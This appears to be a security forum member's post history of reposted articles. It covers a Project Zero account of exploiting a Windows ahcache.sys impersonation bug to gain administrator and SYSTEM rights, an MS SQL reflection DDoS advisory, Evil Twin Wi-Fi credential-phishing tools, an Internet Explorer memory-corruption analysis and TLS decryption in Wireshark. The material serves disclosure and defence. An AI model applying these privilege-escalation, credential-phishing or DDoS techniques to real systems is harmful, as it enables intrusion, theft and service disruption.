Everything posted by Nytro
-
Posted by James Forshaw, currently impersonating NT AUTHORITY\SYSTEM.

Much as I enjoy the process of vulnerability research, sometimes there's a significant disparity between the difficulty of finding a vulnerability and exploiting it. The Project Zero blog contains numerous examples of complex exploits for seemingly trivial vulnerabilities. You might wonder why we'd go to this level of effort to prove exploitability; surely we don't need to do so? Hopefully by the end of this blog post you'll have a better understanding of why it's often the case that we spend significant effort to demonstrate a security issue by developing a working proof of concept (PoC).

Our primary target for a PoC is the vendor, but there are other benefits to developing one. A customer of the vendor's system can use the PoC to test whether they're vulnerable to the issue and to ensure any patch has been correctly applied. And the security industry can use it to develop mitigations and signatures for the vulnerability even if the vendor is not willing or able to patch. Without the PoC being made available, only people who reverse engineer the patch are likely to know about it, and they might not have your best interests in mind.

I don't want this blog post to get bogged down in too much technical detail about the bug (CVE-2015-0002 for reference). Instead I'm going to focus on the process of taking that relatively simple vulnerability, determining exploitability and developing a PoC. This PoC should be sufficient for a vendor to make a reasonable assessment of the presented vulnerability and to minimize their triage efforts. I'll also explain my rationale for taking various shortcuts in the PoC development and why it has to be so.

Reporting a Vulnerability

One of the biggest issues with vulnerability research on closed or proprietary systems is dealing with the actual reporting process to get a vulnerability fixed. This is especially the case with complex or non-obvious vulnerabilities.
If the system is open source I could develop a patch, submit it, and it would stand a chance of getting fixed. For a closed-source system I have to go through the reporting process. To understand this better, let's think about what a typical large vendor might need to do when receiving external security vulnerability reports. This is a really simplified view of vulnerability response handling, but it's sufficient to explain the principles.

For a company which develops the majority of its software internally I have little influence over the patching cycle, but I can make a difference in the triage cycle. The easier I can make the vendor's life, the shorter the triage cycle can be and the quicker a patch can be released. Everyone wins, except hopefully the people who might be using this vulnerability already. Don't forget: just because I didn't know about this vulnerability before doesn't mean it isn't already known about.

In an ideal vulnerability research world (i.e. one in which I have to do the least amount of non-research work), if I find a bug all I'd need to do is write up some quick notes about it and send them to the vendor; they'd understand the system, immediately move heaven and earth to develop the patch, job done. Of course it doesn't work that way. Sometimes just getting a vendor to recognize there's even a security issue is an important first step. There can be a significant barrier in moving from the triage cycle to the patch cycle, especially as they're usually separate entities inside a company. To give the report the best chance possible I'll do two things:

- Put together a report of sufficient detail so the vendor understands the vulnerability
- Develop a PoC which unequivocally demonstrates the security impact

Writing up a Report

Writing up a report for the vendor is pretty crucial to getting an issue fixed, although it isn't sufficient in many cases.
You can imagine that if I wrote something like, "Bug in ahcache.sys, fixit, *lol*", that wouldn't really help the vendor much. At the very least I'd want to provide some context, such as what systems the vulnerability affects (and doesn't affect), what the impact of the vulnerability is (to the best of my knowledge) and what area of the system the issue resides in.

Why wouldn't the report alone be sufficient? Think about how a large modern software product is developed. It's likely developed by a team of people who each work on individual parts. Depending on the age of the vulnerable code, the original developer might have moved on to other projects, left the company entirely or been hit by the number 42 bus. Even if it's relatively recent code written by a single person who's still around to talk to, that doesn't mean they remember how the code works. Anyone who's developed software of any size will have come across code they wrote a month, a week or even a day ago and wondered how it works. There's a real possibility that the security researcher who's spent time going through the executable instruction by instruction knows it better than anyone else in the world.

You can also think about the report in a scientific sense: it's your vulnerability hypothesis. Some vulnerabilities can be proven; for example, a buffer overflow can typically be proven mathematically, since placing 10 things into a space for 5 doesn't work. But in many cases there's nothing better than empirical proof of exploitability. Done right, it can be experimentally validated by both the reporter and the vendor; this is the value of a proof-of-concept. Correctly developed, the vendor can observe the effects of the experiment, converting my hypothesis into a theory which no one can disprove.

Proving Exploitability through Experimentation

So the hypothesis posits that the vulnerability has a real-world security impact; we'll prove it objectively using our PoC.
To do this we need to provide the vendor not just with the mechanism to prove that the vulnerability is real, but also with clear observations that can be made, and an explanation of why those observations constitute a security issue. What observations need to be made depends on the type of vulnerability. For memory corruption vulnerabilities it might be sufficient to demonstrate an application crashing in response to certain input. This isn't always the case, though: some memory corruptions don't give the attacker any useful control. Therefore demonstrating control over the current execution flow, such as controlling the EIP register, is usually the ideal. For logical vulnerabilities it might be more nuanced, such as being able to write a file to a location you shouldn't be able to, or the calculator application ending up running with elevated privileges. There's no one-size-fits-all approach; however, at the very least you want to demonstrate some security impact which can be observed objectively.

The thing to understand is that I'm not developing a PoC for the purpose of being a useful exploit (from an attacker's perspective) but to prove it's a security issue with a sufficient level of confidence that it will get fixed. Unfortunately it isn't always easy to separate these two aspects, and sometimes without demonstrating local privilege escalation or remote code execution an issue isn't taken as seriously as it should be.

Developing a Proof of Concept

Now let's go into some of the challenges I faced in developing a PoC for the ahcache vulnerability I identified. Let's not forget there's a trade-off between the time spent developing a PoC and the chance of the vulnerability being fixed. If I don't spend enough time developing a working PoC the vendor could turn around and not fix the vulnerability; on the other hand, the more time I spend, the longer this vulnerability exists, which is potentially just as bad for users.
Vulnerability Technical Details

Having a bit of understanding of the vulnerability will help frame the discussion later. You can view the issue, with the attached PoC that I sent to Microsoft, here. The vulnerability exists in the ahcache.sys driver, which was introduced in Windows 8.1. In essence this driver implements the Windows native system call NtApphelpCacheControl. This system call handles a local cache of application compatibility information, which is used to correct application behaviour on newer versions of Windows. You can read more about application compatibility here.

Some operations of this system call are privileged, so the driver checks the current calling application to ensure it has administrator privileges. This is done in the function AhcVerifyAdminContext, which looks something like the following code:

    BOOLEAN AhcVerifyAdminContext()
    {
        BOOLEAN CopyOnOpen;
        BOOLEAN EffectiveOnly;
        SECURITY_IMPERSONATION_LEVEL ImpersonationLevel;
        PACCESS_TOKEN token = PsReferenceImpersonationToken(
            NtCurrentThread(),
            &CopyOnOpen,
            &EffectiveOnly,
            &ImpersonationLevel);

        if (token == NULL) {
            token = PsReferencePrimaryToken(NtCurrentProcess());
        }

        PSID user = GetTokenUser(token);
        if (RtlEqualSid(user, LocalSystemSid) || SeTokenIsAdmin(token)) {
            return TRUE;
        }

        return FALSE;
    }

This code queries whether the current thread is impersonating another user. Windows allows a thread to pretend to be someone else on the system so that security operations can be correctly evaluated. If the thread is impersonating, a pointer to an access token is returned. If NULL is returned from PsReferenceImpersonationToken, the code queries for the current process' access token. Finally the code checks whether the access token's user is the local system user, or whether the token is a member of the Administrators group. If the function returns TRUE then the privileged operation is allowed to go ahead. This all seems fine, so what's the issue?
While full impersonation is a privileged operation limited to users which have the impersonate privilege in their token, a normal user without the privilege can impersonate other users for non-security-related functions. The kernel differentiates between privileged and unprivileged impersonation by assigning a security level to the token when impersonation is enabled. To understand the vulnerability there are only two levels of interest: SecurityImpersonation, which means the impersonation is privileged, and SecurityIdentification, which is unprivileged.

If the token is assigned SecurityIdentification, only operations such as querying for token information, for example the token's user, are allowed. If you try to open a secured resource such as a file, the kernel will deny access. This is the underlying vulnerability: if you look at the code, PsReferenceImpersonationToken returns a copy of the security level assigned to the token, but the code fails to verify that it's at SecurityImpersonation level. This means a normal user who was able to get hold of a Local System access token could impersonate it at SecurityIdentification and still pass the check, as querying for the user is permitted.

Proving Trivial Exploitation

Exploiting the bug requires capturing a Local System access token, impersonating it and then calling the system call with appropriate parameters. This must be achievable from normal user privilege, otherwise it isn't a security vulnerability. The system call is undocumented, so if we wanted to take a shortcut could we just demonstrate that we can capture the token and leave it at that? Not really: what that PoC would demonstrate is that something which is documented as possible is indeed possible, namely that a normal user can capture the token and impersonate it. As the impersonation system is designed, this on its own would not cause a security issue.
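The check logic just described can be modelled in a few lines of Python. This is only a toy model for clarity, not the real kernel C: the function names are mine, and the boolean parameter stands in for the SID/group test the driver performs. Only the enum ordering mirrors the actual Windows SECURITY_IMPERSONATION_LEVEL values.

```python
from enum import IntEnum

class ImpersonationLevel(IntEnum):
    # Ordering matches the Windows SECURITY_IMPERSONATION_LEVEL enum.
    SecurityAnonymous = 0
    SecurityIdentification = 1
    SecurityImpersonation = 2
    SecurityDelegation = 3

def verify_admin_context_buggy(token_is_admin_or_system, level):
    # Vulnerable logic: the impersonation level is retrieved but never
    # checked, so an unprivileged SecurityIdentification token passes.
    return token_is_admin_or_system

def verify_admin_context_fixed(token_is_admin_or_system, level):
    # Corrected logic: reject tokens impersonated below
    # SecurityImpersonation before looking at who the token belongs to.
    if level < ImpersonationLevel.SecurityImpersonation:
        return False
    return token_is_admin_or_system

# A normal user holding a captured Local System token can only
# impersonate it at identification level:
level = ImpersonationLevel.SecurityIdentification
print(verify_admin_context_buggy(True, level))   # True  -> check bypassed
print(verify_admin_context_fixed(True, level))   # False -> access denied
```

The model makes the bug's shape obvious: the vulnerable path never consults the level at all, so holding any Local System token, however weakly, is enough to pass.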
I knew already that COM supports impersonation, and that there are a number of complex privileged system services (for example BITS) which we can communicate with as a normal user and convince to communicate back to our application in order to perform the impersonation. But this wouldn't demonstrate that we can even reach the vulnerable AhcVerifyAdminContext method in the kernel, let alone successfully bypass the check. So began the long process of reverse engineering to work out how the system call works and what parameters you need to pass to get it to do something useful. There's some existing work from other researchers (such as this) but certainly nothing concrete to take forward.

The system call supports a number of different operations, and it turned out that not all of them needed complex parameters. For example the AppHelpNotifyStart and AppHelpNotifyStop operations could be easily called, and they relied on the AhcVerifyAdminContext function. I could now produce a PoC which verifies the check is bypassed by observing the system call's return code:

    BOOL IsSecurityVulnerability()
    {
        ImpersonateLocalSystem();
        NTSTATUS status = NtApphelpCacheControl(AppHelpNotifyStop, NULL);
        return status != STATUS_ACCESS_DENIED;
    }

Is this sufficient to prove exploitability? History has taught me no. For example, this issue has almost exactly the same sort of operation, namely that you can bypass an administrator check through impersonation. In that case I couldn't produce sufficient evidence that it was exploitable for anything other than information disclosure, so in turn it was not fixed, even though it was effectively a security issue. To give ourselves the best chance of proving exploitability we need to spend more time on this PoC.

Improving the Proof-of-Concept

In order to improve upon the first PoC I needed to get a better understanding of what the system call is doing.
The application compatibility cache is used to store lookup data from the application compatibility database. This database contains rules which tell the application compatibility system which executables to apply "shims" to in order to implement custom behaviours, such as lying about the operating system's version number to circumvent an incorrect check. The lookup is made every time a process is created; if a suitable matching entry is found it'll be applied to the new process, and the new process will then look up the shim data it needs to apply from the database. As this occurs every time a new process is created, there's a significant performance impact in going to the database file every time. The cache is there to reduce this impact: a database lookup can be added to the cache, and if that executable is started later the cached lookup quickly eliminates the expensive database lookup, either applying a set of shims or not.

Therefore we should be able to cache an existing lookup and apply it to an arbitrary executable. So I spent some time working out the format of the parameters to the system call in order to add my own cached lookup. The resulting structure for Windows 8.1 32-bit looked like the following:

    struct ApphelpCacheControlData {
        BYTE           unk0[0x98];
        DWORD          query_flags;
        DWORD          cache_flags;
        HANDLE         file_handle;
        HANDLE         process_handle;
        UNICODE_STRING file_name;
        UNICODE_STRING package_name;
        DWORD          buf_len;
        LPVOID         buffer;
        BYTE           unkC0[0x2C];
        UNICODE_STRING module_name;
        BYTE           unkF4[0x14];
    };

You can see there's an awful lot of unknown parts in the structure. This causes a problem if you were to apply it to Windows 7 (which has a slightly different structure) or 64-bit (which has a different-sized structure), but for our purposes it doesn't matter. We're not supposed to be writing code to exploit all versions of Windows; all we need to do is prove the security issue to the vendor.
As long as you inform the vendor of the PoC's limitations (and they pay attention to them) we can do this. The vendor is still better placed to determine whether the PoC proves exploitability across versions of the OS; it's their product after all.

So I could now add an arbitrary cached entry, but what can we actually add? I could only add an entry which would have been the result of an existing lookup. You could modify the database to do something like patch running code (the application compatibility system is also used for hotfixes), but that would require administrator privileges, so I needed an existing shim to repurpose. I built a copy of the SDB explorer tool (available from here) so that I could dump the existing database looking for any useful existing shim. I found that for 32-bit there's a shim which will cause a process to instead start the executable regsvr32.exe, passing the original command line. This tool will load a DLL passed on the command line and execute specific exported methods; if we could control the command line of a privileged process we could redirect it and elevate privileges. This again limits the PoC to 32-bit processes, but that's fine.

The final step, and what caused a lot of confusion, was which process to choose to redirect. I could have spent a lot of time investigating other ways of starting a process where I control the command line, but I already knew one way of doing it: UAC auto-elevation. Auto-elevation is a feature added to Windows 7 to reduce the number of UAC dialogs a typical user sees. The OS defines a fixed list of allowed auto-elevating applications; when UAC is at its default setting, requests to elevate these applications do not show a dialog when the user is an administrator. I can abuse this by applying a cache entry for an existing auto-elevating application (in this case I chose ComputerDefaults.exe) and requesting that the application runs elevated.
This elevated application redirects to regsvr32, passing our fully controlled command line; regsvr32 loads my DLL and we've now got code executing with elevated privileges. The PoC didn't give someone anything they couldn't already do through various other mechanisms (such as this metasploit module), but it was never meant to. It sufficiently demonstrated the issue by providing an observable result (arbitrary code running as an administrator), and from this Microsoft were able to reproduce it and fix it.

Final Bit of Fun

As there was some confusion over whether this was only a UAC bypass, I decided to spend a little time developing a new PoC which gets local system privileges without any reliance on UAC. Sometimes I enjoy writing exploits, if only to prove that it can be done. To convert the original PoC into one which gets local system privileges I needed a different application to redirect. I decided the most likely target was a registered scheduled task, as you can sometimes pass arbitrary arguments to the task handler process. So we've got three criteria for the ideal task: a normal user must be able to start it, it must result in a process starting as local system, and that process must have an arbitrary command line specified by the user.

After a bit of searching I found the ideal candidate, the Windows Store Maintenance Task. As we can see, it runs as the local system user. We can determine that a normal user can start it by looking at the task file's DACL using a tool such as icacls; notice the entry in the following screenshot for NT AUTHORITY\Authenticated Users with Read and Execute (RX) permissions. Finally we can check whether a normal user can pass any arguments to the task by checking the XML task file. In the case of WSTask it uses a custom COM handler, but allows the user to specify two command-line arguments. This results in the executable c:\windows\system32\taskhost.exe executing with an arbitrary command line as the local system user.
It was then just a case of modifying the PoC to add a cache entry for taskhost.exe and starting the task with the path to our DLL. This still has a limitation: it only works on 32-bit Windows 8.1 (there's no 32-bit taskhost.exe on 64-bit platforms to redirect). Still, I'm sure it can be made to work on 64-bit with a bit more effort. As the vulnerability is now fixed I've made the new PoC available; it's attached to the original issue here.

Conclusions

I hope I've demonstrated some of the effort a vulnerability researcher will go to in order to ensure a vulnerability gets fixed. It's ultimately a trade-off between the time spent developing the PoC and the chances of the vulnerability being fixed, especially when the vulnerability is complex or non-obvious. In this case I feel I made the right trade-off. Even though the PoC I sent to Microsoft looked, on the surface, to be only a UAC bypass, combined with the report Microsoft were able to determine the true severity and develop the patch. Of course, if they'd pushed back and claimed it was not exploitable, I would have developed a more robust PoC. As a further demonstration of the severity I did produce a working exploit which gained local system privileges from a normal user account.

Disclosing the PoC exploit is of value in aiding a user's or security company's mitigation of a public vulnerability. Without a PoC it's quite difficult to verify that a security issue has been patched or mitigated. It also helps to inform researchers and developers what types of issues to look out for when developing certain security-sensitive applications. Bug hunting is not the sole approach for Project Zero to help secure software; education is just as important. Project Zero's mission involves tackling software vulnerabilities, and the development of PoCs can be an important part of our duty to help software vendors or open source projects take informed action to fix vulnerabilities.
Posted by Chris Evans at 5:27 PM
Sursa: http://googleprojectzero.blogspot.co.uk/2015/02/a-tokens-tale_9.html
-
Attackers Using New MS SQL Reflection Techniques
By Bill Brenner, February 12, 2015 6:30 AM

The bad guys are using a fairly new technique to tamper with the Microsoft SQL Server Resolution Protocol (MC-SQLR) and launch DDoS attacks. In an advisory released this morning, Akamai's Prolexic Security Engineering & Response Team (PLXsert) described it as a new type of reflection-based distributed denial of service (DDoS) attack. PLXsert first spotted attackers using the technique in October. Last month, researcher Kurt Aubuchon studied another such attack and offered an analysis here. PLXsert replicated this attack by creating a script based on Scapy, an open-source packet manipulation tool. Download the full advisory.

How it works

The attack manifests in the form of Microsoft SQL Server responses to a client query or request via abuse of the Microsoft SQL Server Resolution Protocol (MC-SQLR), which listens on UDP port 1434. MC-SQLR lets clients identify the database instance with which they are attempting to communicate when connecting to a database server or cluster with multiple database instances. Each time a client needs to obtain information on the configured MS SQL servers on the network, the SQL Resolution Protocol can be used; the server responds to the client with a list of instances.

Attackers abuse SQL servers by executing scripted requests and spoofing the source of the query with the IP address of the intended target. Depending on the number of instances present on the abused SQL server, the amplification factor varies. The attack presents a specific payload signature, producing an amplification factor of nearly 25x. In this case, the attacker's request totaled 29 bytes, including IP and UDP headers, and triggered a response of 719 bytes including headers. Some servers may produce a larger or smaller response depending on their configuration. Other tools publicly available on the Internet could reproduce this attack as well.
Replicating this attack does not require a high level of technical skill. A scripted attack would only require a list of SQL servers exposed on the Internet that respond to the query. Attackers could use a unicast client request (0x03) or a broadcast request (0x02); both are requests with a data length of 1 byte that will produce the same type of response from SQL servers. PLXsert identified a tool on GitHub on January 26, 2015, that weaponizes this type of attack for mass abuse.

Defensive measures

Server hardening procedures should always be applied to servers that are exposed to the Internet. As a general rule, services and protocols that are unnecessary should be disabled or blocked. This attack can only be performed by querying SQL servers with SQL Server Resolution Protocol ports exposed to the Internet. The following best practices can help mitigate this type of DDoS attack. These recommendations are by no means exhaustive, and affected organizations should refine and adapt them further based on their specific infrastructure and exposed services.

- Follow Microsoft Technet Security Best Practices to Protect Internet Facing Web Servers.
- The use of ingress and egress filters applied to SQL server ports at firewalls, routers, or edge devices may prevent this attack. If there is a business case for keeping UDP 1434 open, it should be filtered to only allow trusted IP addresses.
- Block inbound connections from the Internet if ports are not needed for external access or administration.
- The SQL Server Resolution Protocol service is not needed on servers that have only one database instance. It has been disabled by default since Microsoft SQL Server 2008, but is not disabled in earlier or desktop-engine versions. Disable this service to prevent the abuse of SQL servers for this type of attack.
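The numbers in the advisory are easy to sanity-check. The sketch below encodes the two 1-byte MC-SQLR probe opcodes named above and reproduces the advisory's amplification arithmetic; the helper function name is mine, and the 29/719 byte counts are the advisory's measured figures, not a protocol constant.

```python
# MC-SQLR listens on UDP 1434; a single-byte request elicits the
# full instance list in response.
CLNT_BCAST_EX = b"\x02"  # broadcast request
CLNT_UCAST_EX = b"\x03"  # unicast request

def amplification_factor(request_bytes, response_bytes):
    """Bandwidth amplification: reflected bytes per attacker byte sent."""
    return response_bytes / request_bytes

# Advisory figures: a 29-byte request (incl. IP/UDP headers) triggered
# a 719-byte response.
factor = amplification_factor(29, 719)
print(f"{factor:.1f}x")  # 24.8x, i.e. the "nearly 25x" in the advisory
```

Since the response size scales with the number of configured instances, servers hosting many instances reflect considerably more than this sample.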
If the use of the SQL Server Resolution Protocol service is needed, add an additional layer of security before the service is accessed, such as authentication via secure methods (SSH, VPN) or filtering as described above.

Sursa: https://blogs.akamai.com/2015/02/plxsert-warns-of-ms-sql-reflection-attacks.html
-
gosms
Your own local SMS gateway

What's the use?
- Can be used to send SMS where you don't have access to the internet, cannot use web SMS gateways, want to save some money per SMS, or have minimal requirements for personal/internal use and such
- Deploy in less than 1 minute
- Supports Windows, GNU/Linux, Mac OS
- Works with GSM modems
- Provides an API over HTTP to push messages to the gateway, just like the internet-based gateways do
- Takes care of queuing, throttling and retrying
- Supports multiple devices at once

Deployment
- Update the [DEVICES] section of conf.ini with your modem's COM port, for ex. COM10 or /dev/USBtty2
- Run

Sursa: https://github.com/haxpax/gosms
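Since gosms exposes an HTTP push API like the hosted gateways do, a client can be a few lines of standard-library Python. The route (`/api/sms/`), the field names (`mobile`, `message`) and the port are assumptions for illustration only; check the gosms README and source for the actual ones before using this.

```python
from urllib.parse import urlencode
from urllib.request import Request

# Host/port of your local gosms instance -- an assumption, adjust to
# whatever conf.ini says.
GATEWAY = "http://localhost:8951"

def build_sms_request(mobile, message):
    """Build a form-encoded POST for the gateway's HTTP push API.

    Route and field names are illustrative guesses, not gosms's
    documented API.
    """
    body = urlencode({"mobile": mobile, "message": message}).encode()
    return Request(GATEWAY + "/api/sms/", data=body, method="POST")

req = build_sms_request("+40700000000", "hello from gosms")
print(req.get_method(), req.full_url)  # POST http://localhost:8951/api/sms/
# urllib.request.urlopen(req) would submit it to a running gateway.
```

The gateway then owns queuing, throttling and retrying, so the client can fire and forget.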
-
INFERNAL-TWIN

This is a tool created to automate the Evil Twin attack, capturing public and guest credentials of an access point.

What this tool will do:
- Set up a monitoring interface
- Set up the DB
- Scan wireless networks in range
- Connect to the selected network SSID
- Obtain the login page used for authentication
- Modify the login page with an attacker-controlled PHP script to obtain the credentials
- Set up an Apache server and serve the fake login page
- Give a victim an IP
- Set up the NAT table
- Dump the traffic

Source && Download
Sursa: infernal-twin - This is evil twin attack automated
-
3VILTWINATTACKER – ROGUE WI-FI ACCESS POINT

This tool creates a rogue Wi-Fi access point, purporting to provide wireless Internet services, but snooping on the traffic.

3vilTwinAttacker dependencies (Kali Linux is recommended):
- Ettercap
- Sslstrip
- Airbase-ng (included in aircrack-ng)
- DHCP

Installing the DHCP server:

Ubuntu:
$ sudo apt-get install isc-dhcp-server

Kali linux:
$ echo "deb Index of /debian wheezy main " >> /etc/apt/sources.list
$ apt-get update && apt-get install isc-dhcp-server

Fedora:
$ sudo yum install dhcp

3vilTwinAttacker options:
- Etter.dns: Edit etter.dns to load the dns spoof module.
- Dns Spoof: Start a dns spoof attack on the fake AP interface ath0.
- Ettercap: Start an ettercap attack on hosts connected to the fake AP, capturing login credentials.
- Sslstrip: sslstrip listens to the traffic on port 10000.
- Driftnet: driftnet sniffs and decodes any JPEG TCP sessions, then displays them in a window.

Source && Download
Sursa: 3vilTwinAttacker - Rogue Wi-Fi Access Point
-
WAIDPS – WIRELESS AUDITING AND IPS/IDS

WAIDPS is an open-source wireless swiss knife written in Python that works in a Linux environment. It is a multipurpose tool designed for auditing (penetration testing) networks, detecting wireless intrusions (WEP/WPA/WPS attacks) and also preventing intrusions (stopping a station from associating with an access point). Apart from these, it will harvest all WiFi information in the surroundings and store it in databases. This is useful when auditing a network where the access point is 'MAC filtered' or has a 'hidden SSID' and there isn't any existing client at that moment. WAIDPS may be useful to penetration testers, wireless trainers, law enforcement agencies and those who are interested to know more about wireless auditing and protection.

The primary purpose of this script is to detect intrusions. Once a wireless intrusion is detected, it is displayed on screen and the attack is also logged to file. Additional features added to the current script which the previous WIDS does not have are:
- automatically save the attack packets into a file
- interactive mode where users are allowed to perform many functions
- allow the user to analyse captured packets
- load a previously saved pcap file or any other pcap file to be examined
- customizable filters
- customizable detection threshold (sensitivity of the IDS in detection)

At present, WAIDPS is able to detect the following wireless attacks, and will subsequently add other detections found in the previous WIDS:
- Association / Authentication flooding
- Detect mass deauthentication, which may indicate a possible WPA attack for the handshake
- Detect possible WEP attacks using the ARP request replay method
- Detect possible WEP attacks using the chopchop method
- Detect possible WPS pin bruteforce attacks by Reaver, Bully, etc.
- Detection of Evil-Twin
- Detection of Rogue Access Point

WAIDPS Requirements

No special equipment is required to use this script as long as you have the following:
- Root access (admin)
- A wireless interface capable of monitoring and injection
- Python 2.7 installed
- Aircrack-NG suite installed
- TShark installed
- TCPDump installed
- Mergecap installed (for joining pcap files)
- xterm installed

Documentation

Source && Download
Sursa: WAIDPS - Wireless Auditing and IPS/IDS
-
Microsoft Internet Explorer 9-11 Windows 7-8.1 Vulnerability (patched in late 2014)
Feb 12, 2015 • suto

I. Vulnerability Description

Uninitialized memory corruption leading to code execution.

II. Analysis

I crafted an HTML file called 1.html and opened it with IE11/Windows 8.1, and the following crash happened (the call tree leads to the vulnerable function). The root cause of the problem is a wrong assumption and memory that is not cleanly reset. When this line of JavaScript executes:

    document.getElementsByTagName('tr')[0].insertCell();

the function CTableRowLayout::EnsureCells will be called. Because a cell is being added to the row, it needs to expand the memory holding the row. First it will reallocate memory in CImplAry::EnsureSizeWorker to be large enough for the new tableRowLayout. The function successfully allocates the memory, but it never resets it to zero. The following lines:

    while ( v2 > v4 )
    {
        --v2;
        *(_DWORD *)(*(_DWORD *)(v3 + 76) + 4 * v2) = 1;
    }

mark whether a cell exists in that row, and the memory at that moment will likely look like:

    0xheap: 0x1 0x1 0x1 ... 0xc0c0c0c0

The value 0xc0c0c0c0 comes from uninitialized memory. So if we prepare some holes in memory with strings of a fitting size, freed before the reallocation, our value will end up in that location (shown with the string 0x40404040). That happens when JavaScript tries to add a new row to the table:

    document.getElementsByTagName('table')[0].insertRow();

but that piece of memory is never reset to 1 to indicate that a cell exists there. So afterwards, when IE tries to access that address, it treats our value as a pointer to a table cell object on the heap. From there it performs calculations and changes some memory, which can lead to a write to controlled memory and quite possibly an ASLR bypass (if the address overwritten is an array length) and code execution.

For the full PoC code please email suto@vnsecurity.net. Happy hunting.

Sursa: Microsoft Internet Explorer 9-11 Windows 7-8.1 Vulnerability (patched in late 2014)
-
Decrypting TLS Browser Traffic With Wireshark – The Easy Way!

Intro

Most IT people are somewhat familiar with Wireshark. It is a traffic analyzer that helps you learn how networking works, diagnose problems and much more. One of the problems with the way Wireshark works is that it can't easily analyze encrypted traffic, like TLS. It used to be that if you had the private key(s) you could feed them into Wireshark and it would decrypt the traffic on the fly, but this only worked when RSA was used for the key exchange mechanism. As people have started to embrace forward secrecy this broke, as having the private key is no longer enough to derive the actual session key used to decrypt the data. The other problem is that a private key should not, or cannot, leave the client, server, or HSM it lives in. This led me to come up with very contrived ways of man-in-the-middling myself to decrypt the traffic (e.g. sslstrip).

Session Key Logging to the Rescue!

Well, my friends, I'm here to tell you that there is an easier way! It turns out that Firefox and the development version of Chrome both support logging the symmetric session keys used to encrypt TLS traffic to a file. You can then point Wireshark at said file and presto: decrypted TLS traffic. Read on to learn how to set this up.

Setting up our Browsers

If you prefer Chrome you must use the Chrome dev channel for this to work; the default Firefox will work too. Next we need to set an environment variable.

On Windows: go into your computer properties, then click "Advance system settings", then "Environment Variables...". Add a new user variable called "SSLKEYLOGFILE" and point it at the location where you want the log file to be.
On Linux or Mac OS X: $ export SSLKEYLOGFILE=~/path/to/sslkeylog.log You can also add this to the last line of your ~/.bashrc on Linux, or ~/.MacOSX/environment on OS X, so that it is set every time you log in. The next time we launch Firefox or the dev channel of Chrome, they will log your TLS keys to this file. Setting up Wireshark You need at least Wireshark 1.6 for this to work. We simply go into the preferences of Wireshark, expand the protocols section, and browse to the location of your log file. The Results This is more along the lines of what we normally see when looking at a TLS packet. This is what it looks like when you switch to the "Decrypted SSL Data" tab. Note that we can now see the request information in plain text! Success! Conclusion I hope you learned something today; this makes capturing TLS communication so much more straightforward. One of the nice things about this setup is that the client/server machine that generates the TLS traffic doesn't have to have Wireshark on it, so you don't have to gum up a client's machine with stuff they won't need; you can either have them dump the log to a network share or copy it off the machine and reunite it with the machine doing the packet capture later. Thanks for stopping by! References: Mozilla Wiki Imperial Violet Photo Credit: Mike Source: https://jimshaver.net/2015/02/11/decrypting-tls-browser-traffic-with-wireshark-the-easy-way/
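For reference, the log file uses the NSS key log format: plain text lines such as `CLIENT_RANDOM <client_random_hex> <master_secret_hex>`, which Wireshark parses to derive the session keys. A minimal Python sketch of reading such a file (the sample line below is made up):

```python
def parse_keylog(lines):
    """Map client_random -> master secret from NSS key-log lines."""
    secrets = {}
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):   # comment lines are allowed
            continue
        label, client_random, secret = line.split()
        if label == "CLIENT_RANDOM":           # TLS <= 1.2 label
            secrets[client_random] = secret
    return secrets

sample = ["# SSL/TLS secrets log file",
          "CLIENT_RANDOM " + "aa" * 32 + " " + "bb" * 48]
secrets = parse_keylog(sample)
```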
-
The Agents Network (or personal data about a few RST members)
Nytro replied to arryichmann's topic in Off-topic
Still, what is "black_death_c4t" doing there? -
I'm looking for someone to develop a Polymorphic crypter
Nytro replied to roberts78's topic in Cosul de gunoi
And about 1000$ budget or even more. You must have at least 50 posts in order to buy something. -
Yeah, that's bad. Try giving it a parameter from -1 to 100 while you're testing (Buffering...), calling it every second, say: Timer 1 sec: -> for(i = -1 to 100) { x = sop.GetState(i); writetofile("i = " & i & " state = " & x) } And check whether anything changes...
-
Concerns regarding the security of biometric authentication February 2, 2015 Daniel Tomescu More and more gadgets that we use these days (smart phones, smart watches, etc.) try to make a personal connection with the owner via his biometric characteristics. Using biometric measures for authentication purposes is a fast-growing trend in the IT world, but there are genuine security concerns regarding the maturity level of these methods and their security faults. How safe is it to use biometrics for authentication? Can they be bypassed? Let's find out! How to find a good biometric characteristic? At this moment, we have 3 main possibilities for verifying a user's identity: something that the user knows (like a code or a passphrase), something that the user has (a smart card or a token) or something that the user is (a biometric characteristic). For a biometric characteristic to be considered a valid authentication method, it should have the following properties: Universality, meaning that the feature must be present in all individuals; Measurability, meaning that the feature can be measured and the individuals are willing to share it for measurement purposes; High accuracy, meaning that the feature can be measured with an acceptable error rate; Uniqueness, meaning that the feature should be different for every individual; Robustness, meaning that the feature should not vary in time for the same individual; Circumvention, meaning that the feature should not be easily altered, imitated or replicated by third parties. Although the standards might seem too restrictive, there is a large number of biometric characteristics that meet the requirements above (or at least most of them) and can be used in user recognition. Full article: Concerns regarding the security of biometric authentication – Security Café
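The "acceptable error rate" in the accuracy requirement is usually quantified with two figures: the false accept rate (impostors wrongly matched) and the false reject rate (genuine users wrongly refused). A toy Python sketch with made-up match scores, just to illustrate the trade-off a threshold creates:

```python
def error_rates(genuine, impostor, threshold):
    """Scores >= threshold are accepted; return (FAR, FRR)."""
    far = sum(s >= threshold for s in impostor) / len(impostor)
    frr = sum(s < threshold for s in genuine) / len(genuine)
    return far, frr

genuine  = [0.91, 0.85, 0.78, 0.96]   # hypothetical same-person scores
impostor = [0.12, 0.35, 0.81, 0.07]   # hypothetical different-person scores
far, frr = error_rates(genuine, impostor, threshold=0.80)
```

Raising the threshold lowers FAR at the cost of FRR, and vice versa; vendors often quote the point where the two curves cross (the equal error rate).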
-
Such a service wouldn't be a bad idea either.
-
An option to download a music playlist as MP3 would be useful.
-
Windows tcpip.sys Arbitrary Write Privilege Escalation
Nytro replied to Aerosol's topic in Exploituri
Nice. Too bad it's limited. if ("#{major}.#{minor}.#{build}" == "5.2.3790" && revision < 5440) return Exploit::CheckCode::Vulnerable end -
Exploiting “BadIRET” vulnerability
Nytro posted a topic in Reverse engineering & exploit development
